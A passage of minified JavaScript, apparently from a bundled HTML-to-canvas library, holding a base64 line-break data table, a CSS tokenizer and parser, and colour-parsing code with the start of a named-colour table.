UABQAFAAKwBQAFAAUABQAFAAUABQACsAUABQAFAAUAArAFAAUABQAFAAKwBQACsAUABQAFAAUABQAFAAUABQAFAAUAArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwArACsAUABQAFAAKwBQAFAAUABQAFAAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwAeAB4AKwArACsAKwArACsAKwArACsAKwArACsAKwArAE8ATwBPAE8ATwBPAE8ATwBPAE8ATwBPAE8AJQAlACUAHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHgAeAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB4AHgAeACUAJQAlAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQApACkAKQApACkAKQApACkAKQApACkAKQApACkAKQApACkAKQApACkAKQApACkAKQApACkAJQAlACUAJQAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAeAB4AJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlAB4AHgAlACUAJQAlACUAHgAlACUAJQAlACUAIAAgACAAJQAlACAAJQAlACAAIAAgACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACEAIQAhACEAIQAlACUAIAAgACUAJQAgACAAIAAgACAAIAAgACAAIAAgACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJQAlACUAIAAlACUAJQAlACAAIAAgACUAIAAgACAAJQAlACUAJQAlACUAJQAgACUAIAAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAHgAlAB4AJQAeACUAJQAlACUAJQAgACUAJQAlACUAHgAlAB4AHgAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlAB4AHgAeAB4AHgAeAB4AJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAeAB4AHgAeAB4AHgAeAB4AHgAeACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAIAAlACUAJQAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAJQAlACUAJQAgACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAHgAeAB4AHgAeAB4AHgAeACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAeAB4AHgAeAB4AHgAlACUAJQAlACUAJQAlACAAIAAgACUAJQAlACAAIAAgACAAIAAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeABcAFwAXABUAFQAVAB4AHgAeAB4AJQAlACUAIAAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAIAAgACUAJQAlACUAJQAlACUAJQAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AJQAlACUAJQAlACUAJQAlACUAJQAlACUAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AJQAlACUAJQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeACUAJQAlACUAJQAlACUAJQAeAB4AHgAeAB4AHgAeAB4AHgAeACUAJQAlACUAJQAlAB4AHgAeAB4AHgAeAB4AHgAlACUAJQAlACUAJQAlACUAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAgACUAJQAgACUAJQAlACUAJQAlACUAJQAgACAAIAAgACAAIAAgACAAJQAlACUAJQAlACUAIAAlACUAJQAlACUAJQAlACUAJQAgACAAIAAgACAAIAAgACAAIAAgACUAJQAgACAAIAAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAgACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAIAAlACAAIAAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAgACAAIAAlACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJQAlAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AKwAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwArACsAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAKwArAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXACUAJQBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwAlACUAJQAlACUAJQAlACUAJQAlACUAVwBXACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAKwAEACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAA=="),_e=Array.isArray(ge)?function(fe){for(var ce=fe.length,ge=[],_e=0;_e<ce;_e+=4)ge.push(fe[_e+3]<<24|fe[_e+2]<<16|fe[_e+1]<<8|fe[_e]);return ge}(ge):new Uint32Array(ge),je=Array.isArray(ge)?function(fe){for(var ce=fe.length,ge=[],_e=0;_e<ce;_e+=2)ge.push(fe[_e+1]<<8|fe[_e]);return ge}(ge):new Uint16Array(ge),dt=X(je,12,_e[4]/2),_t=2===_e[5]?X(je,(24+_e[4])/2):function(fe,ce,ge){return fe.slice?fe.slice(ce,ge):new Uint32Array(Array.prototype.slice.call(fe,ce,ge))}(_e,Math.ceil((24+_e[4])/4)),new R(_e[0],_e[1],_e[2],_e[3],dt,_t)),Qt=[Wi,36],ei=[1,2,3,5],$o=[me,8],ai=[xt,st],$t=ei.concat($o),zo=[qt,Qn,Kt,Jt,Gt],Ut=[ht,Ge],ua=function(fe,ce,ge,_e){var je=_e[ge];if(Array.isArray(fe)?-1!==fe.indexOf(je):fe===je)for(var tt=ge;tt<=_e.length;){if((dt=_e[++tt])===ce)return!0;if(dt!==me)break}if(je===me)for(tt=ge;tt>0;){var _t=_e[--tt];if(Array.isArray(fe)?-1!==fe.indexOf(_t):fe===_t)for(var gt=ge;gt<=_e.length;){var dt;if((dt=_e[++gt])===ce)return!0;if(dt!==me)break}if(_t!==me)break}return!1},Ha=function(fe,ce){for(var ge=fe;ge>=0;){var _e=ce[ge];if(_e!==me)return _e;ge--}return 0},Va=function(fe,ce,ge,_e,je){if(0===ge[_e])return Pt;var tt=_e-1;if(Array.isArray(je)&&!0===je[tt])return Pt;var dt=tt-1,_t=tt+1,gt=ce[tt],kt=dt>=0?ce[dt]:0,Lt=ce[_t];if(2===gt&&3===Lt)return Pt;if(-1!==ei.indexOf(gt))return"!";if(-1!==ei.indexOf(Lt)||-1!==$o.indexOf(Lt))return Pt;if(8===Ha(tt,ce))return"\xf7";if(11===Ho.get(fe[tt])||(gt===zt||gt===fa)&&11===Ho.get(fe[_t])||7===gt||7===Lt||9===gt||-1===[me,Ge,ht].indexOf(gt)&&9===Lt||-1!==[lt,ft,xe,Le,pt].indexOf(Lt)||Ha(tt,ce)===Oe||ua(23,Oe,tt,ce)||ua([lt,ft],Je,tt,ce)||ua(12,12,tt,ce))return Pt;if(gt===me)return"\xf7";if(23===gt||23===Lt)return Pt;if(16===Lt||16===gt)return"\xf7";if(-1!==[Ge,ht,Je].indexOf(Lt)||14===gt||36===kt&&-1!==Ut.indexOf(gt)||gt===pt&&36===Lt||Lt===We||-1!==Qt.indexOf(Lt)&&gt===$e||-1!==Qt.indexOf(gt)&&Lt===$e||gt===xt&&-1!==[jt,zt,fa].indexOf(Lt)||-1!==[jt,zt,fa].indexOf(gt)&&Lt===st||-1!==Qt.indexOf(gt)&&-1!==ai.indexOf(Lt)||-1!==ai.indexOf(gt)&&-1!==Qt.indexOf(Lt)||-1!==[xt,st].indexOf(gt)&&(Lt===$e||-1!==[Oe,ht].indexOf(Lt)&&ce[_t+1]===$e)||-1!==[Oe,ht].indexOf(gt)&&Lt===$e||gt===$e&&-1!==[$e,pt,Le].indexOf(Lt))return Pt;if(-1!==[$e,pt,Le,lt,ft].indexOf(Lt))for(var Ht=tt;Ht>=0;){if((ui=ce[Ht])===$e)return Pt;if(-1===[pt,Le].indexOf(ui))break;Ht--}if(-1!==[xt,st].indexOf(Lt))for(Ht=-1!==[lt,ft].indexOf(gt)?dt:tt;Ht>=0;){var ui;if((ui=ce[Ht])===$e)return Pt;if(-1===[pt,Le].indexOf(ui))break;Ht--}if(qt===gt&&-1!==[qt,Qn,Jt,Gt].indexOf(Lt)||-1!==[Qn,Jt].indexOf(gt)&&-1!==[Qn,Kt].indexOf(Lt)||-1!==[Kt,Gt].indexOf(gt)&&Lt===Kt||-1!==zo.indexOf(gt)&&-1!==[We,st].indexOf(Lt)||-1!==zo.indexOf(Lt)&&gt===xt||-1!==Qt.indexOf(gt)&&-1!==Qt.indexOf(Lt)||gt===Le&&-1!==Qt.indexOf(Lt)||-1!==Qt.concat($e).indexOf(gt)&&Lt===Oe&&-1===ii.indexOf(fe[_t])||-1!==Qt.concat($e).indexOf(Lt)&&gt===ft)return Pt;if(41===gt&&41===Lt){for(var Ki=ge[tt],Ni=1;Ki>0&&41===ce[--Ki];)Ni++;if(Ni%2!=0)return Pt}return gt===zt&&Lt===fa?Pt:"\xf7"},co=function(fe,ce){ce||(ce={lineBreak:"normal",wordBreak:"normal"});var ge=function(fe,ce){void 0===ce&&(ce="strict");var ge=[],_e=[],je=[];return fe.forEach(function(tt,dt){var _t=Ho.get(tt);if(_t>50?(je.push(!0),_t-=50):je.push(!1),-1!==["normal","auto","loose"].indexOf(ce)&&-1!==[8208,8211,12316,12448].indexOf(tt))return _e.push(dt),ge.push(16);if(4===_t||11===_t){if(0===dt)return _e.push(dt),ge.push(Wi);var gt=ge[dt-1];return-1===$t.indexOf(gt)?(_e.push(_e[dt-1]),ge.push(gt)):(_e.push(dt),ge.push(Wi))}return _e.push(dt),31===_t?ge.push("strict"===ce?Je:jt):_t===Bo||29===_t?ge.push(Wi):43===_t?ge.push(tt>=131072&&tt<=196605||tt>=196608&&tt<=262141?jt:Wi):void ge.push(_t)}),[_e,ge,je]}(fe,ce.lineBreak),_e=ge[0],je=ge[1],tt=ge[2];return("break-all"===ce.wordBreak||"break-word"===ce.wordBreak)&&(je=je.map(function(_t){return-1!==[$e,Wi,Bo].indexOf(_t)?jt:_t})),[_e,je,"keep-all"===ce.wordBreak?tt.map(function(_t,gt){return _t&&fe[gt]>=19968&&fe[gt]<=40959}):void 0]},io=function(){function fe(ce,ge,_e,je){this.codePoints=ce,this.required="!"===ge,this.start=_e,this.end=je}return fe.prototype.slice=function(){return g.apply(void 0,this.codePoints.slice(this.start,this.end))},fe}(),cs=function(fe){return fe>=48&&fe<=57},Ll=function(fe){return cs(fe)||fe>=65&&fe<=70||fe>=97&&fe<=102},Vm=function(fe){return 10===fe||9===fe||32===fe},Af=function(fe){return function(fe){return function(fe){return fe>=97&&fe<=122}(fe)||function(fe){return fe>=65&&fe<=90}(fe)}(fe)||function(fe){return fe>=128}(fe)||95===fe},Bs=function(fe){return Af(fe)||cs(fe)||45===fe},Zp=function(fe){return fe>=0&&fe<=8||11===fe||fe>=14&&fe<=31||127===fe},nd=function(fe,ce){return 92===fe&&10!==ce},kc=function(fe,ce,ge){return 45===fe?Af(ce)||nd(ce,ge):!!Af(fe)||!(92!==fe||!nd(fe,ce))},ec=function(fe,ce,ge){return 43===fe||45===fe?!!cs(ce)||46===ce&&cs(ge):cs(46===fe?ce:fe)},V2=function(fe){var ce=0,ge=1;(43===fe[ce]||45===fe[ce])&&(45===fe[ce]&&(ge=-1),ce++);for(var _e=[];cs(fe[ce]);)_e.push(fe[ce++]);var je=_e.length?parseInt(g.apply(void 0,_e),10):0;46===fe[ce]&&ce++;for(var tt=[];cs(fe[ce]);)tt.push(fe[ce++]);var dt=tt.length,_t=dt?parseInt(g.apply(void 0,tt),10):0;(69===fe[ce]||101===fe[ce])&&ce++;var gt=1;(43===fe[ce]||45===fe[ce])&&(45===fe[ce]&&(gt=-1),ce++);for(var kt=[];cs(fe[ce]);)kt.push(fe[ce++]);var Lt=kt.length?parseInt(g.apply(void 0,kt),10):0;return ge*(je+_t*Math.pow(10,-dt))*Math.pow(10,gt*Lt)},kM={type:2},dc={type:3},vo={type:4},e_={type:13},B2={type:8},Ud={type:21},Xn={type:9},Tf={type:10},t_={type:11},i_={type:12},n0={type:14},mc={type:23},qd={type:1},H2={type:25},Wt={type:24},Ds={type:26},o0={type:27},a_={type:28},yi={type:29},r0={type:31},Uu={type:32},Ot=function(){function fe(){this._value=[]}return fe.prototype.write=function(ce){this._value=this._value.concat(E(ce))},fe.prototype.read=function(){for(var ce=[],ge=this.consumeToken();ge!==Uu;)ce.push(ge),ge=this.consumeToken();return ce},fe.prototype.consumeToken=function(){var ce=this.consumeCodePoint();switch(ce){case 34:return this.consumeStringToken(34);case 35:var ge=this.peekCodePoint(0),_e=this.peekCodePoint(1),je=this.peekCodePoint(2);if(Bs(ge)||nd(_e,je)){var tt=kc(ge,_e,je)?2:1;return{type:5,value:this.consumeName(),flags:tt}}break;case 36:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),e_;break;case 39:return this.consumeStringToken(39);case 40:return kM;case 41:return dc;case 42:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),n0;break;case 43:if(ec(ce,this.peekCodePoint(0),this.peekCodePoint(1)))return this.reconsumeCodePoint(ce),this.consumeNumericToken();break;case 44:return vo;case 45:var _t=ce,gt=this.peekCodePoint(0),kt=this.peekCodePoint(1);if(ec(_t,gt,kt))return this.reconsumeCodePoint(ce),this.consumeNumericToken();if(kc(_t,gt,kt))return this.reconsumeCodePoint(ce),this.consumeIdentLikeToken();if(45===gt&&62===kt)return this.consumeCodePoint(),this.consumeCodePoint(),Wt;break;case 46:if(ec(ce,this.peekCodePoint(0),this.peekCodePoint(1)))return this.reconsumeCodePoint(ce),this.consumeNumericToken();break;case 47:if(42===this.peekCodePoint(0))for(this.consumeCodePoint();;){var Lt=this.consumeCodePoint();if(42===Lt&&47===(Lt=this.consumeCodePoint()))return this.consumeToken();if(-1===Lt)return this.consumeToken()}break;case 58:return Ds;case 59:return o0;case 60:if(33===this.peekCodePoint(0)&&45===this.peekCodePoint(1)&&45===this.peekCodePoint(2))return this.consumeCodePoint(),this.consumeCodePoint(),H2;break;case 64:var Ht=this.peekCodePoint(0),ui=this.peekCodePoint(1),Ki=this.peekCodePoint(2);if(kc(Ht,ui,Ki))return{type:7,value:this.consumeName()};break;case 91:return a_;case 92:if(nd(ce,this.peekCodePoint(0)))return this.reconsumeCodePoint(ce),this.consumeIdentLikeToken();break;case 93:return yi;case 61:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),B2;break;case 123:return t_;case 125:return i_;case 117:case 85:var Ni=this.peekCodePoint(0),Ui=this.peekCodePoint(1);return 43===Ni&&(Ll(Ui)||63===Ui)&&(this.consumeCodePoint(),this.consumeUnicodeRangeToken()),this.reconsumeCodePoint(ce),this.consumeIdentLikeToken();case 124:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),Xn;if(124===this.peekCodePoint(0))return this.consumeCodePoint(),Ud;break;case 126:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),Tf;break;case-1:return Uu}return Vm(ce)?(this.consumeWhiteSpace(),r0):cs(ce)?(this.reconsumeCodePoint(ce),this.consumeNumericToken()):Af(ce)?(this.reconsumeCodePoint(ce),this.consumeIdentLikeToken()):{type:6,value:g(ce)}},fe.prototype.consumeCodePoint=function(){var ce=this._value.shift();return void 0===ce?-1:ce},fe.prototype.reconsumeCodePoint=function(ce){this._value.unshift(ce)},fe.prototype.peekCodePoint=function(ce){return ce>=this._value.length?-1:this._value[ce]},fe.prototype.consumeUnicodeRangeToken=function(){for(var ce=[],ge=this.consumeCodePoint();Ll(ge)&&ce.length<6;)ce.push(ge),ge=this.consumeCodePoint();for(var _e=!1;63===ge&&ce.length<6;)ce.push(ge),ge=this.consumeCodePoint(),_e=!0;if(_e)return{type:30,start:parseInt(g.apply(void 0,ce.map(function(gt){return 63===gt?48:gt})),16),end:parseInt(g.apply(void 0,ce.map(function(gt){return 63===gt?70:gt})),16)};var dt=parseInt(g.apply(void 0,ce),16);if(45===this.peekCodePoint(0)&&Ll(this.peekCodePoint(1))){this.consumeCodePoint(),ge=this.consumeCodePoint();for(var _t=[];Ll(ge)&&_t.length<6;)_t.push(ge),ge=this.consumeCodePoint();return{type:30,start:dt,end:parseInt(g.apply(void 0,_t),16)}}return{type:30,start:dt,end:dt}},fe.prototype.consumeIdentLikeToken=function(){var ce=this.consumeName();return"url"===ce.toLowerCase()&&40===this.peekCodePoint(0)?(this.consumeCodePoint(),this.consumeUrlToken()):40===this.peekCodePoint(0)?(this.consumeCodePoint(),{type:19,value:ce}):{type:20,value:ce}},fe.prototype.consumeUrlToken=function(){var ce=[];if(this.consumeWhiteSpace(),-1===this.peekCodePoint(0))return{type:22,value:""};var ge=this.peekCodePoint(0);if(39===ge||34===ge){var _e=this.consumeStringToken(this.consumeCodePoint());return 0===_e.type&&(this.consumeWhiteSpace(),-1===this.peekCodePoint(0)||41===this.peekCodePoint(0))?(this.consumeCodePoint(),{type:22,value:_e.value}):(this.consumeBadUrlRemnants(),mc)}for(;;){var je=this.consumeCodePoint();if(-1===je||41===je)return{type:22,value:g.apply(void 0,ce)};if(Vm(je))return this.consumeWhiteSpace(),-1===this.peekCodePoint(0)||41===this.peekCodePoint(0)?(this.consumeCodePoint(),{type:22,value:g.apply(void 0,ce)}):(this.consumeBadUrlRemnants(),mc);if(34===je||39===je||40===je||Zp(je))return this.consumeBadUrlRemnants(),mc;if(92===je){if(!nd(je,this.peekCodePoint(0)))return this.consumeBadUrlRemnants(),mc;ce.push(this.consumeEscapedCodePoint())}else ce.push(je)}},fe.prototype.consumeWhiteSpace=function(){for(;Vm(this.peekCodePoint(0));)this.consumeCodePoint()},fe.prototype.consumeBadUrlRemnants=function(){for(;;){var ce=this.consumeCodePoint();if(41===ce||-1===ce)return;nd(ce,this.peekCodePoint(0))&&this.consumeEscapedCodePoint()}},fe.prototype.consumeStringSlice=function(ce){for(var _e="";ce>0;){var je=Math.min(5e4,ce);_e+=g.apply(void 0,this._value.splice(0,je)),ce-=je}return this._value.shift(),_e},fe.prototype.consumeStringToken=function(ce){for(var ge="",_e=0;;){var je=this._value[_e];if(-1===je||void 0===je||je===ce)return{type:0,value:ge+=this.consumeStringSlice(_e)};if(10===je)return this._value.splice(0,_e),qd;if(92===je){var tt=this._value[_e+1];-1!==tt&&void 0!==tt&&(10===tt?(ge+=this.consumeStringSlice(_e),_e=-1,this._value.shift()):nd(je,tt)&&(ge+=this.consumeStringSlice(_e),ge+=g(this.consumeEscapedCodePoint()),_e=-1))}_e++}},fe.prototype.consumeNumber=function(){var ce=[],ge=4,_e=this.peekCodePoint(0);for((43===_e||45===_e)&&ce.push(this.consumeCodePoint());cs(this.peekCodePoint(0));)ce.push(this.consumeCodePoint());_e=this.peekCodePoint(0);var je=this.peekCodePoint(1);if(46===_e&&cs(je))for(ce.push(this.consumeCodePoint(),this.consumeCodePoint()),ge=8;cs(this.peekCodePoint(0));)ce.push(this.consumeCodePoint());_e=this.peekCodePoint(0),je=this.peekCodePoint(1);var tt=this.peekCodePoint(2);if((69===_e||101===_e)&&((43===je||45===je)&&cs(tt)||cs(je)))for(ce.push(this.consumeCodePoint(),this.consumeCodePoint()),ge=8;cs(this.peekCodePoint(0));)ce.push(this.consumeCodePoint());return[V2(ce),ge]},fe.prototype.consumeNumericToken=function(){var ce=this.consumeNumber(),ge=ce[0],_e=ce[1],je=this.peekCodePoint(0),tt=this.peekCodePoint(1),dt=this.peekCodePoint(2);return kc(je,tt,dt)?{type:15,number:ge,flags:_e,unit:this.consumeName()}:37===je?(this.consumeCodePoint(),{type:16,number:ge,flags:_e}):{type:17,number:ge,flags:_e}},fe.prototype.consumeEscapedCodePoint=function(){var ce=this.consumeCodePoint();if(Ll(ce)){for(var ge=g(ce);Ll(this.peekCodePoint(0))&&ge.length<6;)ge+=g(this.consumeCodePoint());Vm(this.peekCodePoint(0))&&this.consumeCodePoint();var _e=parseInt(ge,16);return 0===_e||function(fe){return fe>=55296&&fe<=57343}(_e)||_e>1114111?65533:_e}return-1===ce?65533:ce},fe.prototype.consumeName=function(){for(var ce="";;){var ge=this.consumeCodePoint();if(Bs(ge))ce+=g(ge);else{if(!nd(ge,this.peekCodePoint(0)))return this.reconsumeCodePoint(ge),ce;ce+=g(this.consumeEscapedCodePoint())}}},fe}(),Fr=function(){function fe(ce){this._tokens=ce}return fe.create=function(ce){var ge=new Ot;return ge.write(ce),new fe(ge.read())},fe.parseValue=function(ce){return fe.create(ce).parseComponentValue()},fe.parseValues=function(ce){return fe.create(ce).parseComponentValues()},fe.prototype.parseComponentValue=function(){for(var ce=this.consumeToken();31===ce.type;)ce=this.consumeToken();if(32===ce.type)throw new SyntaxError("Error parsing CSS component value, unexpected EOF");this.reconsumeToken(ce);var ge=this.consumeComponentValue();do{ce=this.consumeToken()}while(31===ce.type);if(32===ce.type)return ge;throw new SyntaxError("Error parsing CSS component value, multiple values found when expecting only one")},fe.prototype.parseComponentValues=function(){for(var ce=[];;){var ge=this.consumeComponentValue();if(32===ge.type)return ce;ce.push(ge),ce.push()}},fe.prototype.consumeComponentValue=function(){var ce=this.consumeToken();switch(ce.type){case 11:case 28:case 2:return this.consumeSimpleBlock(ce.type);case 19:return this.consumeFunction(ce)}return ce},fe.prototype.consumeSimpleBlock=function(ce){for(var ge={type:ce,values:[]},_e=this.consumeToken();;){if(32===_e.type||qu(_e,ce))return ge;this.reconsumeToken(_e),ge.values.push(this.consumeComponentValue()),_e=this.consumeToken()}},fe.prototype.consumeFunction=function(ce){for(var ge={name:ce.value,values:[],type:18};;){var _e=this.consumeToken();if(32===_e.type||3===_e.type)return ge;this.reconsumeToken(_e),ge.values.push(this.consumeComponentValue())}},fe.prototype.consumeToken=function(){var ce=this._tokens.shift();return void 0===ce?Uu:ce},fe.prototype.reconsumeToken=function(ce){this._tokens.unshift(ce)},fe}(),Un=function(fe){return 15===fe.type},ur=function(fe){return 17===fe.type},tn=function(fe){return 20===fe.type},zl=function(fe){return 0===fe.type},ls=function(fe,ce){return tn(fe)&&fe.value===ce},Bm=function(fe){return 31!==fe.type},Wl=function(fe){return 31!==fe.type&&4!==fe.type},xs=function(fe){var ce=[],ge=[];return fe.forEach(function(_e){if(4===_e.type){if(0===ge.length)throw new Error("Error parsing function args, zero tokens for arg");return ce.push(ge),void(ge=[])}31!==_e.type&&ge.push(_e)}),ge.length&&ce.push(ge),ce},qu=function(fe,ce){return 11===ce&&12===fe.type||28===ce&&29===fe.type||2===ce&&3===fe.type},ws=function(fe){return 17===fe.type||15===fe.type},In=function(fe){return 16===fe.type||ws(fe)},n_=function(fe){return fe.length>1?[fe[0],fe[1]]:[fe[0]]},xo={type:17,number:0,flags:4},Vi={type:16,number:50,flags:4},Ia={type:16,number:100,flags:4},wo=function(fe,ce,ge){var _e=fe[0],je=fe[1];return[_n(_e,ce),_n(void 0!==je?je:_e,ge)]},_n=function(fe,ce){if(16===fe.type)return fe.number/100*ce;if(Un(fe))switch(fe.unit){case"rem":case"em":return 16*fe.number;default:return fe.number}return fe.number},Bl_parse=function(fe,ce){if(15===ce.type)switch(ce.unit){case"deg":return Math.PI*ce.number/180;case"grad":return Math.PI/200*ce.number;case"rad":return ce.number;case"turn":return 2*Math.PI*ce.number}throw new Error("Unsupported angle type")},tc=function(fe){return 15===fe.type&&("deg"===fe.unit||"grad"===fe.unit||"rad"===fe.unit||"turn"===fe.unit)},$a=function(fe){switch(fe.filter(tn).map(function(ge){return ge.value}).join(" ")){case"to bottom right":case"to right bottom":case"left top":case"top left":return[xo,xo];case"to top":case"bottom":return ds(0);case"to bottom left":case"to left bottom":case"right top":case"top right":return[xo,Ia];case"to right":case"left":return ds(90);case"to top left":case"to left top":case"right bottom":case"bottom right":return[Ia,Ia];case"to bottom":case"top":return ds(180);case"to top right":case"to right top":case"left bottom":case"bottom left":return[Ia,xo];case"to left":case"right":return ds(270)}return 0},ds=function(fe){return Math.PI*fe/180},Hs_parse=function(fe,ce){if(18===ce.type){var ge=Hm[ce.name];if(void 0===ge)throw new Error('Attempting to parse an unsupported color function "'+ce.name+'"');return ge(fe,ce.values)}if(5===ce.type){if(3===ce.value.length){var _e=ce.value.substring(0,1),je=ce.value.substring(1,2),tt=ce.value.substring(2,3);return ko(parseInt(_e+_e,16),parseInt(je+je,16),parseInt(tt+tt,16),1)}if(4===ce.value.length){_e=ce.value.substring(0,1),je=ce.value.substring(1,2),tt=ce.value.substring(2,3);var dt=ce.value.substring(3,4);return ko(parseInt(_e+_e,16),parseInt(je+je,16),parseInt(tt+tt,16),parseInt(dt+dt,16)/255)}if(6===ce.value.length)return _e=ce.value.substring(0,2),je=ce.value.substring(2,4),tt=ce.value.substring(4,6),ko(parseInt(_e,16),parseInt(je,16),parseInt(tt,16),1);if(8===ce.value.length)return _e=ce.value.substring(0,2),je=ce.value.substring(2,4),tt=ce.value.substring(4,6),dt=ce.value.substring(6,8),ko(parseInt(_e,16),parseInt(je,16),parseInt(tt,16),parseInt(dt,16)/255)}if(20===ce.type){var _t=Oc[ce.value.toUpperCase()];if(void 0!==_t)return _t}return Oc.TRANSPARENT},Pc=function(fe){return 0==(255&fe)},er=function(fe){var ce=255&fe,ge=255&fe>>8,_e=255&fe>>16,je=255&fe>>24;return ce<255?"rgba("+je+","+_e+","+ge+","+ce/255+")":"rgb("+je+","+_e+","+ge+")"},ko=function(fe,ce,ge,_e){return(fe<<24|ce<<16|ge<<8|Math.round(255*_e)<<0)>>>0},Gd=function(fe,ce){if(17===fe.type)return fe.number;if(16===fe.type){var ge=3===ce?1:255;return 3===ce?fe.number/100*ge:Math.round(fe.number/100*ge)}return 0},od=function(fe,ce){var ge=ce.filter(Wl);if(3===ge.length){var _e=ge.map(Gd);return ko(_e[0],_e[1],_e[2],1)}if(4===ge.length){var _t=ge.map(Gd);return ko(_t[0],_t[1],_t[2],_t[3])}return 0};function ic(fe,ce,ge){return ge<0&&(ge+=1),ge>=1&&(ge-=1),ge<1/6?(ce-fe)*ge*6+fe:ge<.5?ce:ge<2/3?6*(ce-fe)*(2/3-ge)+fe:fe}var jd=function(fe,ce){var ge=ce.filter(Wl),_e=ge[0],je=ge[1],tt=ge[2],dt=ge[3],_t=(17===_e.type?ds(_e.number):Bl_parse(fe,_e))/(2*Math.PI),gt=In(je)?je.number/100:0,kt=In(tt)?tt.number/100:0,Lt=void 0!==dt&&In(dt)?_n(dt,1):1;if(0===gt)return ko(255*kt,255*kt,255*kt,1);var Ht=kt<=.5?kt*(gt+1):kt+gt-kt*gt,ui=2*kt-Ht,Ki=ic(ui,Ht,_t+1/3),Ni=ic(ui,Ht,_t),Ui=ic(ui,Ht,_t-1/3);return ko(255*Ki,255*Ni,255*Ui,Lt)},Hm={hsl:jd,hsla:jd,rgb:od,rgba:od},uo=function(fe,ce){return Hs_parse(fe,Fr.create(ce).parseComponentValue())},Oc={ALICEBLUE:4042850303,ANTIQUEWHITE:4209760255,AQUA:16777215,AQUAMARINE:2147472639,AZURE:4043309055,BEIGE:4126530815,BISQUE:4293182719,BLACK:255,BLANCHEDALMOND:4293643775,BLUE:65535,BLUEVIOLET:2318131967,BROWN:2771004159,BURLYWOOD:3736635391,CADETBLUE:1604231423,CHARTREUSE:2147418367,CHOCOLATE:3530104575,CORAL:4286533887,CORNFLOWERBLUE:1687547391,CORNSILK:4294499583,CRIMSON:3692313855,CYAN:16777215,DARKBLUE:35839,DARKCYAN:9145343,DARKGOLDENROD:3095837695,DARKGRAY:2846468607,DARKGREEN:6553855,DARKGREY:2846468607,DARKKHAKI:3182914559,DARKMAGENTA:2332068863,DARKOLIVEGREEN:1433087999,DARKORANGE:4287365375,DARKORCHID:2570243327,DARKRED:2332033279,DARKSALMON:3918953215,DARKSEAGREEN:2411499519,DARKSLATEBLUE:1211993087,DARKSLATEGRAY:793726975,DARKSLATEGREY:793726975,DARKTURQUOISE:13554175,DARKVIOLET:2483082239,DEEPPINK:4279538687,DEEPSKYBLUE:12582911,